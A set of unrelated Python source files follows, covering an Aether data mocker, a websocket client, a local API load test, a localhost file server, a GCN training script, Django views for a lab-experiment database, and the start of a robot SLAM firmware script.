for name, mocker in self.types.items():
log.info("Stopping thread for %s" % name)
mocker.kill()
def register(self, name, payload=None):
# register an entity of type 'name'
# if no payload is passed, an appropriate one will be created
count = self.type_count.get(name, 0)
count += 1
self.type_count[name] = count
if not payload:
payload = self.types[name].get()
type_name = self.alias.get(name)
type_id = self.schema_id.get(name)
ps_id = self.project_schema.get(type_id)
data = self.payload_to_data(ps_id, payload)
try:
res = self.client.entities.create(data=data)
log.debug("Created instance # %s of type %s" % (self.type_count[name], name))
except AetherAPIException as err:
log.error("in creation of entity of type %s: %s" % (name, err))
return data
def payload_to_data(self, ps_id, payload):
# wraps data in expected aether jargon for submission
data = {
"id": payload['id'],
"payload": payload,
"projectschema": ps_id,
"mapping_revision": "None",
"status": "Publishable"
}
return data
def load(self):
# loads schemas and project schemas from aether client
log.debug("Loading schemas from Aether Kernel")
for schema in self.client.schemas.paginated('list'):
name = schema.name
log.debug("Loading schema for type %s \n%s" % (name, schema))
_id = schema.id
definition = schema.definition
if isinstance(definition, str):
definition = json.loads(definition)
if isinstance(definition, list):
full_name = [obj.get("name") for obj in definition if obj.get(
'name').endswith(name)][0]
else:
full_name = definition.get('name')
namespace = definition.get('namespace')
if namespace:
                if name not in namespace:
full_name = namespace+"."+name
self.types[full_name] = DataMocker(
full_name, json.dumps(definition), self)
self.names[name] = full_name
self.names[full_name] = name
self.types[name] = self.types[full_name]
self.alias[full_name] = name
self.alias[name] = full_name
self.schema_id[name] = _id
self.schema_id[full_name] = _id
self.schema_id[_id] = name
for ps in self.client.projectschemas.paginated('list'):
schema_id = ps.schema
_id = ps.id
self.project_schema[schema_id] = _id
self.project_schema[_id] = schema_id
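# A rough usage sketch for the mocker (the kernel URL and credentials are placeholders,
# not values defined anywhere in this module):
#
#   manager = MockingManager("http://kernel.local:8000", "admin", "password")
#   if "Person" in manager.types:            # one DataMocker per loaded schema name
#       manager.register("Person")           # create and submit one mocked entity
#   manager.kill()                           # stop the DataMocker worker threads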
|
wss.py
|
from .base import BaseSocket
from ..util import Logger
import websocket
import threading
import json
import time
class WebSocketApiSocket(BaseSocket):
"""
Generic REST API call
"""
def __init__(self, id):
"""
Constructor
:param id: Socket id
"""
BaseSocket.__init__(self)
self.ws = None # Web socket
self.id = id
self.wst = None # Web socket thread
self._connecting = False
self._connected = False
self.on_message_handlers = []
self.on_open_handlers = []
self.on_close_handlers = []
self.on_error_handlers = []
def connect(self, url,
on_message_handler=None,
on_open_handler=None,
on_close_handler=None,
on_error_handler=None,
reconnect_interval=10):
"""
:param url: Url link
        :param on_message_handler: Message handler which takes the message as
                                   the first argument
        :param on_open_handler: Socket open handler which takes the socket as
                                the first argument
        :param on_close_handler: Socket close handler which takes the socket as
                                 the first argument
        :param on_error_handler: Socket error handler which takes the socket as
                                 the first argument and the error as the second
                                 argument
:param reconnect_interval: The time interval for reconnection
"""
Logger.info(self.__class__.__name__, "Connecting to socket <%s>..." % self.id)
if on_message_handler is not None:
self.on_message_handlers.append(on_message_handler)
if on_open_handler is not None:
self.on_open_handlers.append(on_open_handler)
if on_close_handler is not None:
self.on_close_handlers.append(on_close_handler)
if on_error_handler is not None:
self.on_error_handlers.append(on_error_handler)
if not self._connecting and not self._connected:
self._connecting = True
self.ws = websocket.WebSocketApp(url,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error)
self.wst = threading.Thread(target=lambda: self.__start(reconnect_interval=reconnect_interval))
self.wst.start()
return self.wst
def send(self, msg):
"""
Send message
:param msg: Message
:return:
"""
self.ws.send(msg)
def __start(self, reconnect_interval=10):
while True:
self.ws.run_forever()
Logger.info(self.__class__.__name__, "Socket <%s> is going to reconnect..." % self.id)
time.sleep(reconnect_interval)
def __on_message(self, ws, m):
m = json.loads(m)
if len(self.on_message_handlers) > 0:
for handler in self.on_message_handlers:
handler(m)
def __on_open(self, ws):
Logger.info(self.__class__.__name__, "Socket <%s> is opened." % self.id)
self._connected = True
if len(self.on_open_handlers) > 0:
for handler in self.on_open_handlers:
handler(ws)
def __on_close(self, ws):
Logger.info(self.__class__.__name__, "Socket <%s> is closed." % self.id)
self._connecting = False
self._connected = False
if len(self.on_close_handlers) > 0:
for handler in self.on_close_handlers:
handler(ws)
def __on_error(self, ws, error):
Logger.info(self.__class__.__name__, "Socket <%s> error:\n %s" % (self.id, error))
if len(self.on_error_handlers) > 0:
for handler in self.on_error_handlers:
handler(ws, error)
if __name__ == '__main__':
Logger.init_log()
    socket = WebSocketApiSocket('test')
socket.connect('ws://localhost', reconnect_interval=1)
time.sleep(10)
|
httprw.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, random
import moment
import multiprocessing
from httpinit import generateUser
para_list = []
for i in range(0,1000):
para_list.append(generateUser(i))
post_url = "http://192.168.99.100:4000/user/"
numprocess = 100
def sendrwrequest():
st = moment.now().epoch()
for i in range(0,100):
j = random.randint(0,999)
action = ["read", "write"][(random.random() > 0.86)]
if(action == "read"):
r = requests.get(post_url+para_list[j]["_id"])
else:
#r = requests.put(post_url+para_list[i]["_id"],para_list[i])
r = requests.put(post_url+para_list[j]["_id"],para_list[j])
#print r.text
#print r.status_code
if(r.status_code != 200 or "status" in r.json()):
            print(i)
            print("read write failed")
break
runt = moment.now().epoch() - st
    print(runt)
plist = []
for i in range (0,numprocess):
p = multiprocessing.Process(target = sendrwrequest)
plist.append(p)
for i in range (0,numprocess):
plist[i].start()
|
server.py
|
# -*- coding: utf-8 -*-
import os
import posixpath
import threading
from http.server import SimpleHTTPRequestHandler
from socketserver import ThreadingTCPServer
from urllib.parse import unquote
HERE = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
class SimpleHTTPRequestHandlerHere(SimpleHTTPRequestHandler, object):
def send_head(self):
if self.client_address[0] != "127.0.0.1":
self.send_error(
401, "Unauthorized", "No permission -- see authorization schemes"
)
return None
else:
return super(SimpleHTTPRequestHandlerHere, self).send_head()
def translate_path(self, path):
"""
Ignore the actual request path and just serve a specific folder.
Mostly same as py3.6 source, replacing "path = os.getcwd()" with HERE so
that the directory list or file transfers are relative to HERE rather
than the current working directory.
"""
# abandon query parameters
path = path.split("?", 1)[0]
path = path.split("#", 1)[0]
# Don"t forget explicit trailing slash when normalizing. Issue17324
trailing_slash = path.rstrip().endswith("/")
try:
path = unquote(path, errors="surrogatepass")
except UnicodeDecodeError:
path = unquote(path)
except TypeError: # py2 only accepts one param.
path = unquote(path)
path = posixpath.normpath(path)
words = path.split("/")
words = filter(None, words)
path = HERE # edited
for word in words:
if os.path.dirname(word) or word in (os.curdir, os.pardir):
# Ignore components that are not a simple file/directory name
continue
path = os.path.join(path, word)
if trailing_slash:
path += "/"
return path
def log_message(self, format, *args):
pass # be quiet
class ThreadingServerInThread:
"""
Context manager for running a threading http server in a thread.
    Since the Thread is not using "daemon=True", it will keep Python running
    until the server is shut down when the context manager exits, letting
    in-flight requests complete.
"""
def __init__(self, port=8000):
self._server_address = ("127.0.0.1", port)
self._handler = SimpleHTTPRequestHandlerHere
self.httpd = ThreadingTCPServer(
self._server_address, self._handler, bind_and_activate=False
)
def _bind_and_activate(self):
try:
self.httpd.server_bind()
self.httpd.server_activate()
except Exception as e:
self.httpd.server_close()
raise e
def start(self):
self._bind_and_activate()
thread = threading.Thread(target=self.httpd.serve_forever)
thread.start()
def stop(self):
self.httpd.shutdown()
self.httpd.server_close()
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
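# A minimal usage sketch (the port and file name are arbitrary examples):
#
#   with ThreadingServerInThread(port=8000):
#       # serves the local "data" directory to 127.0.0.1 clients while the block runs,
#       # e.g. http://127.0.0.1:8000/index.html
#       ...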
|
train_gcn.py
|
import argparse
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
from dgl.nn.pytorch import GraphConv
import dgl.multiprocessing as mp
from torch.nn.parallel import DistributedDataParallel
import os
import sys
import samgraph.torch as sam
import datetime
from common_config import *
class GCN(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation,
dropout):
super(GCN, self).__init__()
self.layers = nn.ModuleList()
# input layer
self.layers.append(
GraphConv(in_feats, n_hidden, activation=activation, allow_zero_in_degree=True))
# hidden layers
for _ in range(n_layers - 2):
self.layers.append(
GraphConv(n_hidden, n_hidden, activation=activation, allow_zero_in_degree=True))
# output layer
self.layers.append(
GraphConv(n_hidden, n_classes, allow_zero_in_degree=True))
self.dropout = nn.Dropout(p=dropout)
def forward(self, blocks, features):
h = features
for i, layer in enumerate(self.layers):
if i != 0:
h = self.dropout(h)
h = layer(blocks[i], h)
return h
def parse_args(default_run_config):
argparser = argparse.ArgumentParser("GCN Training")
add_common_arguments(argparser, default_run_config)
argparser.add_argument('--fanout', nargs='+',
type=int, default=default_run_config['fanout'])
argparser.add_argument('--lr', type=float,
default=default_run_config['lr'])
argparser.add_argument('--dropout', type=float,
default=default_run_config['dropout'])
argparser.add_argument('--weight-decay', type=float,
default=default_run_config['weight_decay'])
return vars(argparser.parse_args())
def get_run_config():
run_config = {}
run_config.update(get_default_common_config(run_mode=RunMode.SGNN))
run_config['sample_type'] = 'khop2'
run_config['fanout'] = [5, 10, 15]
run_config['lr'] = 0.003
run_config['dropout'] = 0.5
run_config['weight_decay'] = 0.0005
run_config.update(parse_args(run_config))
process_common_config(run_config)
assert(run_config['arch'] == 'arch6')
assert(run_config['sample_type'] != 'random_walk')
run_config['num_fanout'] = run_config['num_layer'] = len(
run_config['fanout'])
print_run_config(run_config)
return run_config
def run_init(run_config):
sam.config(run_config)
sam.data_init()
if run_config['validate_configs']:
sys.exit()
def run(worker_id, run_config):
num_worker = run_config['num_worker']
global_barrier = run_config['global_barrier']
ctx = run_config['workers'][worker_id]
device = torch.device(ctx)
print('[Worker {:d}/{:d}] Started with PID {:d}({:s})'.format(
worker_id, num_worker, os.getpid(), torch.cuda.get_device_name(ctx)))
sam.sample_init(worker_id, ctx)
sam.train_init(worker_id, ctx)
if num_worker > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = num_worker
torch.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=worker_id,
timeout=datetime.timedelta(seconds=get_default_timeout()))
in_feat = sam.feat_dim()
num_class = sam.num_class()
num_layer = run_config['num_layer']
model = GCN(in_feat, run_config['num_hidden'], num_class,
num_layer, F.relu, run_config['dropout'])
model = model.to(device)
if num_worker > 1:
model = DistributedDataParallel(
model, device_ids=[device], output_device=device)
loss_fcn = nn.CrossEntropyLoss()
loss_fcn = loss_fcn.to(device)
optimizer = optim.Adam(
model.parameters(), lr=run_config['lr'], weight_decay=run_config['weight_decay'])
num_epoch = sam.num_epoch()
num_step = sam.num_local_step()
model.train()
epoch_sample_total_times = []
epoch_sample_times = []
epoch_get_cache_miss_index_times = []
epoch_copy_times = []
epoch_convert_times = []
epoch_train_times = []
epoch_total_times_python = []
epoch_train_total_times_profiler = []
epoch_cache_hit_rates = []
copy_times = []
convert_times = []
train_times = []
total_times = []
# run start barrier
global_barrier.wait()
print('[Worker {:d}] run for {:d} epochs with {:d} steps'.format(
worker_id, num_epoch, num_step))
run_start = time.time()
for epoch in range(num_epoch):
# epoch start barrier
global_barrier.wait()
tic = time.time()
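        # steps are strided across workers: worker i handles steps i, i + num_worker,
        # i + 2 * num_worker, ..., so each worker runs num_step local steps per epoch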
for step in range(worker_id, num_step * num_worker, num_worker):
t0 = time.time()
sam.sample_once()
batch_key = sam.get_next_batch()
t1 = time.time()
blocks, batch_input, batch_label = sam.get_dgl_blocks(
batch_key, num_layer)
t2 = time.time()
# Compute loss and prediction
batch_pred = model(blocks, batch_input)
loss = loss_fcn(batch_pred, batch_label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
event_sync()
batch_input = None
batch_label = None
blocks = None
t3 = time.time()
copy_time = sam.get_log_step_value(epoch, step, sam.kLogL1CopyTime)
convert_time = t2 - t1
train_time = t3 - t2
total_time = t3 - t1
sam.log_step(epoch, step, sam.kLogL1TrainTime, train_time)
sam.log_step(epoch, step, sam.kLogL1ConvertTime, convert_time)
sam.log_epoch_add(epoch, sam.kLogEpochConvertTime, convert_time)
sam.log_epoch_add(epoch, sam.kLogEpochTrainTime, train_time)
sam.log_epoch_add(epoch, sam.kLogEpochTotalTime, total_time)
copy_times.append(copy_time)
convert_times.append(convert_time)
train_times.append(train_time)
total_times.append(total_time)
sam.report_step_average(epoch, step)
event_sync()
# sync the train workers
if num_worker > 1:
torch.distributed.barrier()
toc = time.time()
epoch_total_times_python.append(toc - tic)
# epoch end barrier
global_barrier.wait()
feat_nbytes = sam.get_log_epoch_value(
epoch, sam.kLogEpochFeatureBytes)
miss_nbytes = sam.get_log_epoch_value(
epoch, sam.kLogEpochMissBytes)
epoch_cache_hit_rates.append(
(feat_nbytes - miss_nbytes) / feat_nbytes)
epoch_sample_total_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochSampleTotalTime)
)
epoch_sample_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochSampleTime)
)
epoch_get_cache_miss_index_times.append(
sam.get_log_epoch_value(
epoch, sam.KLogEpochSampleGetCacheMissIndexTime)
)
epoch_copy_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochCopyTime))
epoch_convert_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochConvertTime))
epoch_train_times.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochTrainTime))
epoch_train_total_times_profiler.append(
sam.get_log_epoch_value(epoch, sam.kLogEpochTotalTime))
if worker_id == 0:
print('Epoch {:05d} | Epoch Time {:.4f} | Sample {:.4f} | Copy {:.4f} | Total Train(Profiler) {:.4f}'.format(
epoch, epoch_total_times_python[-1], epoch_sample_total_times[-1], epoch_copy_times[-1], epoch_train_total_times_profiler[-1]))
# sync the train workers
if num_worker > 1:
torch.distributed.barrier()
# run end barrier
global_barrier.wait()
run_end = time.time()
print('[Train Worker {:d}] Avg Epoch {:.4f} | Sample {:.4f} | Copy {:.4f} | Train Total (Profiler) {:.4f}'.format(
worker_id, np.mean(epoch_total_times_python[1:]), np.mean(epoch_sample_total_times[1:]), np.mean(epoch_copy_times[1:]), np.mean(epoch_train_total_times_profiler[1:])))
global_barrier.wait() # barrier for pretty print
if worker_id == 0:
test_result = []
test_result.append(('sample_time', np.mean(epoch_sample_times[1:])))
test_result.append(('get_cache_miss_index_time', np.mean(
epoch_get_cache_miss_index_times[1:])))
test_result.append(
('epoch_time:sample_total', np.mean(epoch_sample_total_times[1:])))
test_result.append(('epoch_time:copy_time',
np.mean(epoch_copy_times[1:])))
test_result.append(('convert_time', np.mean(epoch_convert_times[1:])))
test_result.append(('train_time', np.mean(epoch_train_times[1:])))
test_result.append(('epoch_time:train_total', np.mean(
epoch_train_total_times_profiler[1:])))
test_result.append(
('cache_percentage', run_config['cache_percentage']))
test_result.append(('cache_hit_rate', np.mean(
epoch_cache_hit_rates[1:])))
test_result.append(
('epoch_time:total', np.mean(epoch_total_times_python[1:])))
test_result.append(('run_time', run_end - run_start))
for k, v in test_result:
print('test_result:{:}={:.2f}'.format(k, v))
# sam.dump_trace()
sam.shutdown()
if __name__ == '__main__':
run_config = get_run_config()
run_init(run_config)
num_worker = run_config['num_worker']
# global barrier is used to sync all the sample workers and train workers
run_config['global_barrier'] = mp.Barrier(
num_worker, timeout=get_default_timeout())
if num_worker == 1:
run(0, run_config)
else:
workers = []
        # worker processes (each one both samples and trains)
for worker_id in range(num_worker):
p = mp.Process(target=run, args=(worker_id, run_config))
p.start()
workers.append(p)
ret = sam.wait_one_child()
if ret != 0:
for p in workers:
p.kill()
for p in workers:
p.join()
if ret != 0:
sys.exit(1)
|
views.py
|
from django.shortcuts import render
import numpy as np
import os
from Lab_Misc import General
from Lab_Misc.General import *
from .Generate import CreateAndUpdate
import webbrowser
from itertools import chain
import threading
import subprocess
from Exp_Main import Sort_Videos
from django.templatetags.static import static
from django.shortcuts import redirect
from django.http import HttpResponse
from django.http import HttpResponseRedirect
#import Exp_Main.update_Exp as update_Exp
from django_tables2 import SingleTableView
from django_filters.views import FilterView
from django_tables2.views import SingleTableMixin
from django.core.files.storage import default_storage
from .models import ExpPath, Group
from Analysis.models import Comparison
from .forms import New_entry_form
from .models import ExpBase, Observation, ObservationHierarchy
from Exp_Sub.models import ExpBase as ExpBaseSub
from Exp_Sub.models import ExpPath as ExpPathSub
from .models import OCA as OCA_model
from .models import RLD as RLD_model
from .tables import ExpBase_table, get_Table, Observation_table, Group_table, Comparison_table
from .filters import OCA_filter, RLD_filter, ExpBase_filter, get_Filter
from Lab_Misc.forms import get_Form
from .filters import *
from django.apps import apps
from django.urls import reverse_lazy
from bootstrap_modal_forms.generic import (BSModalLoginView,
BSModalCreateView,
BSModalUpdateView,
BSModalReadView,
BSModalDeleteView)
def index(request):
return render(request, 'templates/albums.html')
def Success_return(request):
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))#redirects to previous url
def Comparisons(request):
model = Comparison.objects.all()
context = {'table': Comparison_table(model)}
return render(request, 'Comparison.html', context)
def Generate(request):
cwd = os.getcwd()
Gen = CreateAndUpdate()
if request.method == 'POST' and 'Generate_Names' in request.POST:
Report_Path = Gen.Generate_Names()
path = os.path.join(cwd, Report_Path)
print(path)
webbrowser.open_new(r'' + path)
if request.method == 'POST' and 'Generate_Entries' in request.POST:
        try:
            Sort_Videos.Sort_RSD()
        except Exception:
            pass
        try:
            Sort_Videos.Sort_CON()
        except Exception:
            pass
Report_Paths = Gen.Generate_Entries()
for Report_Path in Report_Paths:
path = os.path.join(cwd, Report_Path)
print(path)
webbrowser.open_new(r'' + path)
if request.method == 'POST' and 'ConnectFilesToExpMain' in request.POST:
Report_Path = Gen.ConnectFilesToExpMain()
path = os.path.join(cwd, Report_Path)
webbrowser.open_new(r'' + path)
return render(request = request,
template_name='Generate.html',)
def Observation_pk(request, pk):
model = ObservationHierarchy.objects.all()
sel_obs = model.get(id = pk)
context = {'Observations': model}
context['table'] = Observation_table(sel_obs.Observation.all())
context['obs_pk'] = pk
context['sel_obs'] = sel_obs
return render(request, 'observations_single.html', context)
def observations(request):
model = ObservationHierarchy.objects.all()
context = {'Observations': model}
context['table'] = Observation_table(Observation.objects.all())
return render(request, 'observations.html', context)
def group_pk(request, pk):
model = Group.objects.all()
sel_obs = model.get(id = pk)
exp_ids = sel_obs.ExpBase.all().values_list('id', flat=True)
context = {'Groups': model}
table_class = get_Table('SFG')
context['table'] = table_class(SFG.objects.filter(id__in = exp_ids))
context['obs_pk'] = pk
context['sel_obs'] = sel_obs
return render(request, 'groups_single.html', context)
def groups(request):
model = Group.objects.all()
context = {'Groups': model}
context['table'] = Group_table(Group.objects.all())
return render(request, 'groups.html', context)
# def update_Exp_view(request):
# if request.method == 'POST' and 'update_Exp' in request.POST:
# get_old_DB = update_Exp.get_old_DB()
# get_old_DB.set_Observation()
# if request.method == 'POST' and 'Con_sub_Exp' in request.POST:
# connect = update_Exp.connect_sub()
# connect.LSP_OCA()
# return render(request = request,
# template_name='update_Exp.html',)
class Exp_table_view(SingleTableMixin, FilterView):
def get_table_class(self, **kwargs):
model_name = self.kwargs['Exp_name']
table_class = get_Table(model_name)
return table_class
def get_queryset(self, **kwargs):
model_name = self.kwargs['Exp_name']
model = apps.get_model('Exp_Main', model_name)
return model.objects.all()
def get_filterset_class(self, **kwargs):
model_name = self.kwargs['Exp_name']
filterset_class = get_Filter(model_name)
return filterset_class
table_pagination = {"per_page": 50}
template_name = 'Show_sample.html'
class Prior_Exp(SingleTableMixin, FilterView):
def get_queryset(self, **kwargs):
Main_id = self.kwargs['pk']
queryset = ExpBase.objects.filter(Sample_name = ExpBase.objects.get(id = Main_id).Sample_name,
Date_time__lte = ExpBase.objects.get(id = Main_id).Date_time)
return queryset
queryset = ExpBase.objects.filter(group__isnull = True)
table = ExpBase_table(queryset)
table_class = ExpBase_table
table_pagination = {"per_page": 50}
template_name = 'Show_sample.html'
filterset_class = ExpBase_filter
class Samples_table_view(SingleTableMixin, FilterView):
queryset = ExpBase.objects.filter(group__isnull = True)
table = ExpBase_table(queryset)
table_class = ExpBase_table
table_pagination = {"per_page": 50}
template_name = 'Show_sample.html'
filterset_class = ExpBase_filter
class Create_new_entry(BSModalCreateView):
template_name = 'Modal/create_entry.html'
form_class = get_Form('Exp_Main', 'HED')
def get_model_name(self, group_name, model_name, pk):
if (model_name == 'None') & (group_name == 'Exp_Main'):
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
elif (model_name == 'None') & (group_name == 'Exp_Sub'):
curr_entry = ExpBaseSub.objects.get(pk = pk)
curr_exp = ExpPathSub.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
else:
name = model_name
return name
def get_form_class(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
formset_class = get_Form(group_name, model_name)
return formset_class
def get_queryset(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
curr_model = apps.get_model(group_name, model_name)
self.curr_entry = curr_model.objects.get(pk = pk)
queryset = curr_model.objects.all()
return queryset
    success_message = 'Success: Entry was created.'
success_url = reverse_lazy('Success_return')
class Update_entry(BSModalUpdateView):
model = ExpBase
template_name = 'Modal/update_entry.html'
form_class = get_Form('Exp_Main', 'OCA')
def get_model_name(self, group_name, model_name, pk):
if (model_name == 'None') & (group_name == 'Exp_Main'):
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
elif (model_name == 'None') & (group_name == 'Exp_Sub'):
curr_entry = ExpBaseSub.objects.get(pk = pk)
curr_exp = ExpPathSub.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
else:
name = model_name
return name
def get_form_class(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
formset_class = get_Form(group_name, model_name)
return formset_class
def get_queryset(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
curr_model = apps.get_model(group_name, model_name)
self.curr_entry = curr_model.objects.get(pk = pk)
queryset = curr_model.objects.all()
return queryset
    success_message = 'Success: Entry was updated.'
success_url = reverse_lazy('Success_return')
class Read_entry(BSModalReadView):
template_name = 'Modal/read_entry.html'
curr_entry = ExpBase.objects.first()
context_object_name = 'ExpBase'
model = ExpBase
def get_context_data(self,*args, **kwargs):
context = super(Read_entry, self).get_context_data(*args,**kwargs)
pk = self.kwargs['pk']
entry = General.get_in_full_model(pk)
try:
if entry.Device.Abbrev == 'RSD':
Drops = range(1,entry.Script.number_of_cycles+1)
Drop_names = ['All']
for Drop in Drops:
Drop_names.append('Drop_'+str(Drop))
context['Drops'] = Drop_names
        except Exception:
context['Drops'] = ['only']
return context
def get_model_name(self, group_name, model_name, pk):
if (model_name == 'None') & (group_name == 'Exp_Main'):
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
elif (model_name == 'None') & (group_name == 'Exp_Sub'):
curr_entry = ExpBaseSub.objects.get(pk = pk)
curr_exp = ExpPathSub.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
else:
name = model_name
return name
def template_path_exists(self, template_path):
return default_storage.exists(os.path.join('Exp_Main/templates', template_path))
def get_queryset(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
curr_model = apps.get_model(group_name, model_name)
self.curr_entry = curr_model.objects.get(pk = pk)
queryset = curr_model.objects.all()
template_name = 'Modal/Experiments/' + str(model_name) + '.html'
if str(model_name) == 'CON':
template_name = 'Modal/Experiments/' + str(model_name) + '_.html'
if self.template_path_exists(template_name):
self.template_name = template_name
return queryset
def post(self, request, *args, **kwargs):
def start_drop_ana():
cwd = os.getcwd()
path = 'Private\\Sessile.drop.analysis\\'
subprocess.call(['python', 'Private/Sessile.drop.analysis/QT_sessile_drop_analysis.py', Link_to_vid, chosen_drop, path])
os.chdir(cwd)
def start_compress_vid():
cwd = os.getcwd()
subprocess.call(['python', 'Private/Sessile.drop.analysis/video_compression.py', Link_to_vid, chosen_drop, compression_level])
os.chdir(cwd)
pk = self.kwargs['pk']
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
curr_model = apps.get_model('Exp_Main', str(curr_exp.Abbrev))
self.curr_entry = curr_model.objects.get(pk = pk)
if os.environ['DJANGO_SETTINGS_MODULE'] == 'Private.settings':
if request.method == 'POST' and 'OpenVideoPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link_Video)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
if request.method == 'POST' and 'Run_compress_vid' in request.POST:
chosen_drop=request.POST.get('Drop_choose')
Link_to_vid = os.path.join(get_BasePath(), self.curr_entry.Link)
compression_level = '1'
x = threading.Thread(target=start_compress_vid)
x.start()
if request.method == 'POST' and 'Run_RSD_Analysis' in request.POST:
chosen_drop=request.POST.get('Drop_choose')
Link_to_vid = os.path.join(get_BasePath(), self.curr_entry.Link)
self.curr_entry.Link_Data = self.curr_entry.Link.replace('01_Videos', '02_Analysis_Results')
self.curr_entry.save()
x = threading.Thread(target=start_drop_ana)
x.start()
if request.method == 'POST' and 'OpenMainPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
if request.method == 'POST' and 'OpenPDFPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link_PDF)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
if request.method == 'POST' and 'OpenDataPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link_Data)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
if request.method == 'POST' and 'OpenXLSXPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link_XLSX)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
else:
if request.method == 'POST' and 'OpenVideoPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
if request.method == 'POST' and 'OpenMainPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
if request.method == 'POST' and 'ShowMainPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponse('file:///' + OS_BasePath + Folder_path)
if request.method == 'POST' and 'OpenPDFPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
if request.method == 'POST' and 'OpenDataPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
if request.method == 'POST' and 'OpenXLSXPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
return HttpResponse('<script>history.back();</script>')
class Delete_entry(BSModalDeleteView):
model = ExpBase
def get_model_name(self, group_name, model_name, pk):
if (model_name == 'None') & (group_name == 'Exp_Main'):
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
elif (model_name == 'None') & (group_name == 'Exp_Sub'):
curr_entry = ExpBaseSub.objects.get(pk = pk)
curr_exp = ExpPathSub.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
else:
name = model_name
return name
def get_queryset(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
curr_model = apps.get_model(group_name, model_name)
self.curr_entry = curr_model.objects.get(pk = pk)
queryset = curr_model.objects.all()
return queryset
template_name = 'Modal/delete_entry.html'
    success_message = 'Success: Entry was deleted.'
success_url = reverse_lazy('Success_return')
|
use_map_autonomous_drive.py
|
'''
Naruda: 2019-1 AJOU Univ. major of Software department Capstone project
Robot main firmware made by "Park Jun-Hyuk" (github nickname 'BrightBurningPark').
The robot can drive by itself and localize its position and direction in a given map.
It can also build the map from scratch.
I love my school and the Capstone Program SO MUCH. It's a true story ^^.
'''
# python basic or pip-installed library import
import sys
import math
import time
import signal
import threading
# adding ./lib dir to use modules
sys.path.append('./lib')
# modules under lib directory
import rpslam # BreezySLAM(tinySLAM Implementation) with RPLidar A1
import pathengine # shortest path finding engine
import ntdriver # network driver set
# General variables like Path, Var, Name, etc...
